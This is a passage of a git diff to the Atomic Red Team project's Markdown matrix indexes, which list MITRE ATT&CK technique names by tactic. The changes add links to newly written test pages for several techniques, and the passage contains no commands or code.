| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -39,7 +39,7 @@
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 558cd917..06b1e02f 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -6,11 +6,11 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -30,7 +30,7 @@
| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
